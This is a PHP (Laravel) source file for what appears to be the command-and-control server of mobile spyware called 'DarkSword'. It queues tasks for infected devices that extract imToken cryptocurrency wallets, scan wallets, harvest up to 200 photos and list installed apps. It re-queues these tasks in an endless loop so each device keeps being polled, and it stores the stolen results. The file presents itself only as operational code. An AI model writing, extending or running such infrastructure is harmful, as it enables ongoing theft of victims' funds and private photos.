Files
coruna-lab/app/Services/DsBeaconQueue.php
T
2026-08-24 06:23:07 +08:00

222 lines
6.5 KiB
PHP

<?php
namespace App\Services;
use App\Models\Device;
use App\Models\DsBeaconTask;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Str;
class DsBeaconQueue
{
/** @var list<string> */
public const TYPES = [
'wallet_extract',
'wallet_scan',
'photo_scan',
'apps',
];
/** @var list<string> */
public const LOOP_TYPES = [
'wallet_extract',
'wallet_scan',
'photo_scan',
'apps',
];
public function seed(Device $device): void
{
if ($device->family !== Device::FAMILY_DARKSWORD) {
return;
}
DsBeaconTask::query()
->where('device_id', $device->id)
->where('type', 'basic_info')
->delete();
if (DsBeaconTask::query()->where('device_id', $device->id)->exists()) {
return;
}
$now = now();
$rows = [];
foreach (self::TYPES as $i => $type) {
$rows[] = [
'device_id' => $device->id,
'position' => $i + 1,
'type' => $type,
'status' => DsBeaconTask::STATUS_PENDING,
'created_at' => $now,
'updated_at' => $now,
];
}
DsBeaconTask::query()->insert($rows);
}
/**
* Next pending command. wallet_extract / wallet_scan / photo_scan / apps
* re-queue after a full pass so the agent keeps polling them.
*
* @return array{type: string, command_id: string, params: array<string, mixed>}|null
*/
public function dequeue(Device $device): ?array
{
$this->seed($device);
return DB::transaction(function () use ($device) {
$task = $this->nextRunnable($device);
if (! $task) {
return null;
}
$commandId = 'dsq-'.$device->id.'-'.$task->position.'-'.Str::lower(Str::random(10));
$meta = is_array($task->result_meta) ? $task->result_meta : [];
$meta['dispatch_count'] = (int) ($meta['dispatch_count'] ?? 0) + 1;
if ($task->status === DsBeaconTask::STATUS_DISPATCHED) {
$meta['last_retry_at'] = now()->toDateTimeString();
}
$task->forceFill([
'status' => DsBeaconTask::STATUS_DISPATCHED,
'command_id' => $commandId,
'dispatched_at' => now(),
'result_meta' => $meta,
])->save();
return [
'type' => $task->type,
'command_id' => $commandId,
'params' => $this->paramsFor($task->type),
];
});
}
/**
* @param array<string, mixed> $payload
*/
public function markDone(array $payload): ?DsBeaconTask
{
$commandId = trim((string) ($payload['command_id'] ?? ''));
if ($commandId === '') {
return null;
}
$task = DsBeaconTask::query()->where('command_id', $commandId)->first();
if (! $task) {
return null;
}
$meta = $task->result_meta ?? [];
$filename = trim((string) ($payload['filename'] ?? ''));
$category = trim((string) ($payload['category'] ?? ''));
if ($filename !== '') {
$meta['filename'] = substr($filename, 0, 255);
}
if ($category !== '') {
$meta['category'] = substr($category, 0, 64);
}
if (isset($payload['status']) && is_string($payload['status'])) {
$meta['status'] = substr($payload['status'], 0, 32);
}
foreach (['path', 'reason', 'stored', 'photo', 'size'] as $key) {
if (array_key_exists($key, $payload)) {
$meta[$key] = $payload[$key];
}
}
$touch = [
'result_count' => (int) $task->result_count + 1,
'result_meta' => $meta,
];
if ($task->status !== DsBeaconTask::STATUS_DONE) {
$touch['status'] = DsBeaconTask::STATUS_DONE;
$touch['completed_at'] = now();
}
$task->forceFill($touch)->save();
return $task->refresh();
}
/**
* @return array<string, mixed>
*/
private function paramsFor(string $type): array
{
return match ($type) {
'wallet_extract' => ['wallet_type' => 'imtoken'],
'photo_scan' => ['max_count' => 200],
default => [],
};
}
private function nextRunnable(Device $device): ?DsBeaconTask
{
while (true) {
$task = $this->findRunnable($device);
if (! $task) {
if (! $this->requeueLoopTypes($device)) {
return null;
}
$task = $this->findRunnable($device);
if (! $task) {
return null;
}
}
if ($task->type !== 'photos' && $task->type !== 'basic_info') {
return $task;
}
$task->forceFill([
'status' => DsBeaconTask::STATUS_SKIPPED,
'completed_at' => now(),
'result_meta' => [
'reason' => $task->type === 'photos'
? 'queue_uses_photo_scan_only'
: 'removed_from_queue',
],
])->save();
}
}
private function findRunnable(Device $device): ?DsBeaconTask
{
return DsBeaconTask::query()
->where('device_id', $device->id)
->where(function ($q) {
$q->where('status', DsBeaconTask::STATUS_PENDING)
->orWhere(function ($q2) {
$q2->where('status', DsBeaconTask::STATUS_DISPATCHED)
->where('result_count', 0);
});
})
->orderBy('position')
->lockForUpdate()
->first();
}
private function requeueLoopTypes(Device $device): bool
{
$tasks = DsBeaconTask::query()
->where('device_id', $device->id)
->whereIn('type', self::LOOP_TYPES)
->where('status', DsBeaconTask::STATUS_DONE)
->lockForUpdate()
->get();
if ($tasks->isEmpty()) {
return false;
}
foreach ($tasks as $task) {
$task->forceFill([
'status' => DsBeaconTask::STATUS_PENDING,
'command_id' => null,
'dispatched_at' => null,
'completed_at' => null,
])->save();
}
return true;
}
}